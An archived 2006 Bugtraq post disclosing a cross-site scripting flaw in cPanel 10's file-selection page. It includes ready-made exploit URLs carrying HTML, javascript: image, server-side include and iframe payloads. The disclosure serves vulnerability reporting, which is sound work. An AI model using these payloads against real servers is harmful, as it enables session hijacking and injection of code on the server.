| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060626033608.7554.qmail@securityfocus.com>
Date: 26 Jun 2006 03:36:08 -0000
From: preth00nker@...il.com
To: bugtraq@...urityfocus.com
Subject: XSS in Cpanel 10
A new vulnerability was found in Cpanel V.10;
It happen cause the variable *&File* of the *select.html* file (in the edit-zone) just filter the <script>'s labels and the possibility can by open to other labels like
*Server Side Include,
*HMTL labels...
*including Javascript expressed in other ways
An attacker can use this vuln. for execute remote scripts in the browser of clients and take advantage of this for hijacking a session or execute SSI code in the own server
Exploit & Examples:
[+] Exploit:
http://[Target]:[Port]/[Dir]/x/files/select.html?dir=/&file= <h1><b>Your code here!!</b></h1>
[+] Javascript:
http://[Target]:2082/frontend/x/files/select.html?dir=/&file=<IMG src="javascript:alert('yeah');">
[+] Server Side Inclusion
http://[Target]:2082/frontend/x/files/select.html?dir=/&file=<!--#echo var="HTTP_REFERER" -->
[+] HTML
http://[Target]:2082/frontend/x/files/select.html?dir=/&file=<IFRAME SRC="index.html">
________________________________________________
discovery by the staff of http://MexHackTeam.org
By Preth00nker
Preth00nker [at] gmail [dot] com
Powered by blists - more mailing lists